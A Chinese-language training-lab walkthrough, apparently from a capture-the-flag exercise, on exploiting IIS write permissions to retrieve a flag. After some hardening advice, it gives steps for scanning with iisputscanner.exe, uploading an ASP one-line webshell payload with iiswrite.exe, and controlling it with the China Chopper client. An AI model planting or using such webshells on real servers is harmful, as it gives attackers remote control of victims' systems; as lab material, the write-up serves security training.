题目11：IIS-write漏洞利用

关卡十一题目：IISWrite漏洞利用关卡描述：IIS写权限对网站系统的安全是致命的，拥有写权限可以直接往网站目录写文件，在拥有写权限的服务器上，其安全相对设置薄弱，因此比较容易被入侵者控制。写权限漏洞严格意义上讲其实不算是漏洞，因为网站内容始终是要进行编辑和修改的。只有对文件的权限分配不慎才会造成写权限被利用，进而被植入木马等情况的发生。建议：1、如果是纯静态页网站，请不要添加写入与删除功能，那么你的空间就是百毒不侵。2、如果有写入权限，无修改与删除功能，那么你的网站也是非常安全的，就算有入侵它所有写入的文件都不能更改（留下足迹）而你网站本身的文件也是相当安全。唯一的是可能会写入很多垃圾文件。3、如果有修改权限，那么与有删除权限其实是一样的。因为一个文件就算删除不了，我把内容清空那与删除这个文件是一样的效果。所以分配这些权限需要小心谨慎。答案提交：1、请提交获取的KEY值。参考步骤：1.进入关卡十一：2.获取目标主机ip地址3.打开工具场景windowsxp4.C：\tools\12.漏洞利用工具\iis写权限漏洞\下iisputscanner.exe进行扫描5.目标系统中搭建网站存在该漏洞，鼠标右击会看到浏览、上传、导出等选项6.选择putfile测试一下，默认有该软件作者写的一个alert.txt文件，点击put，提示上传成功.如图：打开浏览器访问目标主机ip/alert.txt,发现确实已经有该文件，且内容和软件里的一致但是直接通过该软件写个asp木马上传是不行的。使用iiswrite.exe上传内容为%execute(request(lele))%的文本文件##%evalrequest(“a”)%在桌面先新建一个aa.txt文档,内容如下然后通过使用iiswrite.exe上传文本文件。菜刀连接一句话木马C盘根目录发现Flag.txt